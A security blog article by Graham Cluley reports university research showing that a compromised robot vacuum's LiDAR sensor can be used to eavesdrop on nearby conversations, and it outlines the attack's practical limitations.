3 min read

Robot vacuum cleaners can eavesdrop on your conversations, researchers reveal

Graham CLULEY

November 20, 2020

Promo Protect all your devices, without slowing them down.
Free 30-day trial
Robot vacuum cleaners can eavesdrop on your conversations, researchers reveal

* Researchers were able to use data collected by navigation sensors to record audio signals
* Ingenious technique may be able to spy on some sensitive data, but requires a large amount of effort

A team of researchers have explained how internet-connected robot vacuum cleaners can be hacked to eavesdrop on homeowners’ private conversations.

Researchers from the University of Maryland, College Park and the National University of Singapore have published research detailing how they were able to launch an ingenious attack that could stealthily snoop on people without their knowledge – despite there being no actual acoustic microphone built into the vacuum cleaner.

The technique exploits the smart sensors built into robot vacuum cleaners.

Self-driving cars, industrial robots, delivery robots, and robot vacuum cleaners all have a technology in common: Light Detection and Ranging (LiDAR) sensors. LiDAR uses a pulsed laser to help devices measure distances, and navigate obstacles – something that’s important whether it is for an autonomous vehicle on the highway or a robot vacuum cleaner navigation your home.

In a technical paper titled “Spying with Your Robot Vacuum Cleaner: Eavesdropping via Lidar Sensors” the researchers showed how they managed to exploit a robot vacuum cleaner equipped with LiDAR – supposedly used for navigation – to secretly spy on home owners.

The researchers’ were inspired by laser microphones which have been in use since the Cold War.

In a typical spying scenario, a laser microphone will be targeted on the window of a room where a private conversation is taking place. The window’s glass bends and flexes a tiny amount in response to the sound vibrations caused by the conversation in the room – too little for humans to perceive, but enough to be picked up by the laser which bounces back off the reflective window to the eavesdropper.

The different variances in light signal can then be converted back into a conversation and recorded remotely.

Using this inspiration, the researchers built a proof-of-concept attack using a Xiaomi Roborock vacuum cleaning robot. They called their creation “LidarPhone”, which they described as a “remote, stealthy, and scalable acoustic eavesdropping attack.”

In a scenario presented by the researchers in an explanatory video, they described how a sensitive Zoom conversation could vibrate nearby objects such as a trashcan.

A compromised robot vacuum cleaner might then target the trashcan, and record its vibrations via its LiDAR sensors. The light intensity signal gathered by the hacked vacuum cleaner could be sent to a cloud-based server where it could later be analysed and converted back into the original audio by a remote attacker.

Of course, it’s less likely that a password would be stolen in this way – as passwords are not usually said out loud – but it might be a technique that could be used to steal sensitive information such as social security numbers, determine the identity or gender of a speaker, and so forth.

As a hacking technique it’s not without some considerable challenges.

For one thing, it requires malicious hackers to have remote access to the robot vacuum cleaner and its LiDAR data.

In addition, most surfaces are not as good at reflecting signals as windows and mirrors, which means that a robot vacuum cleaner may be collecting data with a low signal-to-noise ratio.

Furthermore, the hardware limitations of robot vacuum cleaners mean that only a low sampling rate can be achieved, less than that required to capture audio intelligible to the human ear.

But now to be outdone, the researchers determined that they could train their systems using machine-learning to help them filter out noise and improve the signal they received from the eavesdropping vacuum cleaner.

Even that, however, doesn’t make the audio good enough quality for the human ear to tell the difference between say a number “seven” being spoken and the number “eight.” Which is why the researchers suggested that a spying system should be trained with just a small set of words (such as the numbers one to ten), and use pattern matching ot make a good prediction as to what has really been said.

tags


Author


Graham CLULEY

Graham Cluley is an award-winning security blogger, researcher and public speaker. He has been working in the computer security industry since the early 1990s.

View all posts

You might also like

Bookmarks


loader